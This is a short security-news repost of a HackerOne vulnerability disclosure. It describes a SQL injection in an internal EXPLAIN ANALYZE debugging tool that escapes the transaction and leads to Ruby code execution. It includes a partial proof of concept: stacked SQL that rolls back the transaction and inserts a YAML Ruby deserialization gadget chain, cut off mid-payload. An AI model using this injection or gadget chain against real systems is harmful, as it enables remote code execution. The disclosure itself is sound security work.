๐ HackerOne: Ability to escape database transaction through SQL injection, leading to arbitrary code execution
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
HackerOne has an internal backend interface that gives debugging capabilities to its engineers. One of the features is the ability to run EXPLAIN ANALYZE queries against a connected database. This feature is accessible by a handful of engineers. The feature is vulnerable to a SQL injection that allows an attacker to escape the transaction that is wrapped around the EXPLAIN ANALYZE query. This SQL injection can be leveraged to execute arbitrary ruby on an application server. This vulnerability will be demonstrated against a local development environment. Proof of concept go to http://localhost:8080/support/sql_query_analyzer analyze the following query using the public database connection: ```sql SELECT 1 ; ROLLBACK ; INSERT INTO user_versions ( item_type ,item_id ,event ,email ,object ) VALUES ( 'User' ,2 ,'update' , 'uniquekeywordtotriggercode@hackerone.com' ,'--- username: - !ruby/object:Gem::Installer i: x - !ruby/object:Gem::SpecFetcher i: y - !ruby/object:Gem::Requirement requirements: !ruby/object:Gem::Package::TarReader io: &1 !ruby/object:Net::BufferedIO io: &1 !ruby/object:Gem::Package::TarReader::Entry read: 0 header: "abc" debug_output: &1 !ruby/object:Net::WriteAdapter socket: &1 !ruby/object:Gem::RequestSet sets:... ...